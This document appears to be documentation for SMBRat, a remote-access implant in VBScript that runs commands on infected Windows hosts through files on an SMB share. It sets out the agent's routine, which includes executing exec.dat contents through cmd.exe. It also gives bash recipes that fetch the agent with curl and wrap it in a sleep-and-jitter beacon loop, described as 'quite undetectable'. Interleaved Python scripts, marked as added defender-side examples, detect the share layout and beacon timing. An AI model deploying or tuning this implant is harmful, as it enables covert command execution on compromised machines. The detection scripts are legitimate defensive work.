# Agent

The Agent is a Visual Basic Script that runs on the infected host.

The Script connects to an SMB Share that is served by the Handler. It does not issue a `net use` command; it simply uses the UNC Path of the Share (`\\hostname\ShareName\<files>`) for every file operation. This avoids mounting the remote Share to a Drive Letter (as `net use Z: \\hostname\ShareName\` would do).
You have to change the top 3 lines of the VBS Agent to match your setup:

```vbscript
ServerName = "\\172.16.47.191"   ' <-- Whatever you do - keep the "\\"
ShareName = "D$"                 ' <-- Make it easy to blend in the rest of SMB traffic
ProjectName = "projectName"      ' <-- Arbitrary name for the Pentest you are working on
```
The script executes in a linear fashion and exits (there is no loop in place). It runs through a routine that is roughly explained below.

Let `<hostname>-<username>-<prim_MAC>` be `folderName`.

1. Is there a directory named `ProjectName` in the Share (`ServerName\ShareName`)? NO -> Create it.
2. Is there a directory named `folderName` in the `ProjectName` directory? NO -> Create it.
3. Is there a file named `checkin.dat` at `ServerName\ShareName\ProjectName\folderName\`? NO -> Create it and write the output of `time /t` and `date /t` in there.
4. Is there a file named `info.dat` at `ServerName\ShareName\ProjectName\folderName\`? NO -> Create it and write the output of `systeminfo` in there.
5. Write zero bytes to the file `ServerName\ShareName\ProjectName\folderName\ping.dat` (to change the modification time of the file).
6. Is there a file named `exec.dat` at `ServerName\ShareName\ProjectName\folderName\`? NO -> Exit.
7. Read `ServerName\ShareName\ProjectName\folderName\exec.dat` and execute the text contents (not the file) with `cmd.exe /c <contents>`.
8. Write the Command's output in `ServerName\ShareName\ProjectName\folderName\output.dat`.
9. Exit.
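The routine above leaves a fixed set of artifacts on the share: a `<ProjectName>` directory, a `<hostname>-<username>-<MAC>` directory beneath it, and the `checkin.dat`, `info.dat`, `ping.dat` (zero bytes) and, once tasked, `exec.dat` / `output.dat` files. The following script, added here as a defender-side example and not part of SMBRat itself, walks a share root and reports directories that match that layout. The MAC formatting in the folder name is not specified on the page, so hex pairs with optional `:` or `-` separators are accepted (an assumption), and the sample share tree it builds is constructed for the demonstration.

```python
"""Hunt for the SMBRat drop-folder layout on a share (added defender-side example)."""
import os
import re
import tempfile

# Files the agent always creates in <ProjectName>/<hostname>-<username>-<MAC>/
ALWAYS_PRESENT = {"checkin.dat", "info.dat", "ping.dat"}
# Files that only exist once a command has been queued or run
TASKING_FILES = {"exec.dat", "output.dat"}
# Folder name ends in a MAC address. The exact MAC formatting the agent uses is
# not given on the page, so hex pairs with optional ':' or '-' separators are
# accepted here (assumption).
FOLDER_RE = re.compile(r"^.+-.+-(?:[0-9A-Fa-f]{2}[:-]?){5}[0-9A-Fa-f]{2}$")


def scan_share(share_root):
    """Walk <share>/<project>/<folder>/ and report folders matching the layout."""
    findings = []
    for project in sorted(os.listdir(share_root)):
        project_path = os.path.join(share_root, project)
        if not os.path.isdir(project_path):
            continue
        for folder in sorted(os.listdir(project_path)):
            folder_path = os.path.join(project_path, folder)
            if not os.path.isdir(folder_path) or not FOLDER_RE.match(folder):
                continue
            files = {f for f in os.listdir(folder_path)
                     if os.path.isfile(os.path.join(folder_path, f))}
            if not ALWAYS_PRESENT <= files:
                continue
            ping = os.path.join(folder_path, "ping.dat")
            findings.append({
                "project": project,
                "folder": folder,
                # exec.dat / output.dat mean the operator has tasked this host
                "tasked": bool(files & TASKING_FILES),
                # the agent only touches ping.dat, so a zero-byte file is expected
                "ping_is_empty": os.path.getsize(ping) == 0,
                # mtime of ping.dat is the last time the agent ran
                "last_checkin": os.path.getmtime(ping),
            })
    return findings


def build_sample_share():
    """Constructed sample tree: one agent-shaped folder plus one decoy folder."""
    root = tempfile.mkdtemp(prefix="share_")
    agent = os.path.join(root, "projectName", "WS01-jdoe-00-11-22-33-44-55")
    os.makedirs(agent)
    for name in ("checkin.dat", "info.dat", "exec.dat"):
        with open(os.path.join(agent, name), "w") as fh:
            fh.write("sample\n")
    open(os.path.join(agent, "ping.dat"), "w").close()  # zero bytes, as the agent writes it
    decoy = os.path.join(root, "projectName", "Backups-2023")
    os.makedirs(decoy)
    open(os.path.join(decoy, "ping.dat"), "w").close()  # same file name, wrong layout
    return root


if __name__ == "__main__":
    for hit in scan_share(build_sample_share()):
        print(hit)
```

Run it against a mounted copy of the share (or a file-server backup) instead of the constructed tree; the `last_checkin` value of `ping.dat` is the most useful field for deciding whether the host is still active.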
To create a fresh Agent which executes every second, run the following with bash:

```bash
DELAY=1000
echo "Do While True" > agent.vbs
curl "https://raw.githubusercontent.com/operatorequals/SMBRat/master/agent.vbs" >> agent.vbs
echo " WScript.Sleep $DELAY" >> agent.vbs
echo "Loop" >> agent.vbs
```

The `$DELAY` is in milliseconds.
If you would like some JITTER Percentage to go with that (Cobalt Strike `sleep 10 20` style):

```bash
DELAY=10000 # A 10 second sleep (in milliseconds)
JITTER=20 # A 20% Jitter on the 10 seconds (sleeping randomly between 8 and 12 seconds)
echo "JitMillis = $DELAY * $JITTER * 0.01" > agent.vbs
echo "Do While True" >> agent.vbs
curl "https://raw.githubusercontent.com/operatorequals/SMBRat/master/agent.vbs" >> agent.vbs
echo "randomize" >> agent.vbs
echo " WScript.Sleep $DELAY+Int((JitMillis+JitMillis+1)*Rnd-JitMillis)" >> agent.vbs
echo "Loop" >> agent.vbs
```

Doing maths in VBS is a pain, so I did it for you.

A 7 second DELAY with a 3 second JITTER is quite undetectable while still responsive...
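The sleep expression above bounds each iteration to `DELAY - JitMillis .. DELAY + JitMillis` (VBS `Rnd` is in [0, 1), so `Int((JitMillis+JitMillis+1)*Rnd-JitMillis)` runs from `-JitMillis` to `+JitMillis`). Because every iteration touches `ping.dat`, the modification times of that file on the share trace the same window. The script below is an added defender-side example, not part of SMBRat: it computes the window for a given DELAY / JITTER, backs DELAY and JITTER out of a series of observed `ping.dat` write times, and flags a series whose gaps cluster in a narrow band the way a sleep-plus-jitter loop does. The timestamps are constructed; the estimate assumes the loop body's own run time is small compared to the sleep.

```python
"""Estimate an agent's sleep/jitter from ping.dat write times (added defender-side example)."""
from datetime import datetime, timedelta
from statistics import mean


def jitter_window_ms(delay_ms, jitter_pct):
    """Sleep range implied by the page's VBS:
        JitMillis = DELAY * JITTER * 0.01
        WScript.Sleep DELAY + Int((JitMillis + JitMillis + 1) * Rnd - JitMillis)
    Rnd is in [0, 1), so the Int(...) term runs from -JitMillis to +JitMillis."""
    jit = int(delay_ms * jitter_pct * 0.01)
    return delay_ms - jit, delay_ms + jit


def intervals_ms(timestamps):
    """Gaps between consecutive observations, in whole milliseconds."""
    ts = sorted(timestamps)
    return [(b - a) // timedelta(milliseconds=1) for a, b in zip(ts, ts[1:])]


def estimate_sleep(timestamps):
    """Back out DELAY and JITTER from observed gaps. Assumes the loop body's own
    run time (share I/O, command execution) is small next to the sleep."""
    iv = intervals_ms(timestamps)
    delay = (min(iv) + max(iv)) // 2
    half_spread = (max(iv) - min(iv)) / 2
    return {"delay_ms": delay,
            "jitter_pct": round(100 * half_spread / delay, 1),
            "intervals_ms": iv}


def looks_like_beacon(timestamps, max_spread_pct=50):
    """A sleep+jitter loop produces gaps clustered in a narrow band; interactive
    or ad-hoc file access does not. Needs a handful of observations to say anything."""
    iv = intervals_ms(timestamps)
    if len(iv) < 3:
        return False
    return (max(iv) - min(iv)) / mean(iv) * 100 <= max_spread_pct


def _times_from_gaps(start, gaps_ms):
    ts = [start]
    for g in gaps_ms:
        ts.append(ts[-1] + timedelta(milliseconds=g))
    return ts


# Constructed observations: ping.dat mtimes as a file server audit log might record them.
START = datetime(2024, 1, 1, 12, 0, 0)
BEACON_TIMES = _times_from_gaps(START, [8400, 11700, 9900, 12000, 8000, 10300])
HUMAN_TIMES = _times_from_gaps(START, [500, 94000, 3100, 400])

if __name__ == "__main__":
    print(jitter_window_ms(10000, 20))            # (8000, 12000)
    print(estimate_sleep(BEACON_TIMES))           # delay 10000 ms, jitter 20.0 %
    print(looks_like_beacon(BEACON_TIMES), looks_like_beacon(HUMAN_TIMES))
```

Feed `estimate_sleep` the write times of a single host's `ping.dat` (from SMB audit logs or repeated `stat` of the share); the beacon-like check is only meaningful once several intervals are available, and a long gap where the host was offline will widen the estimated jitter.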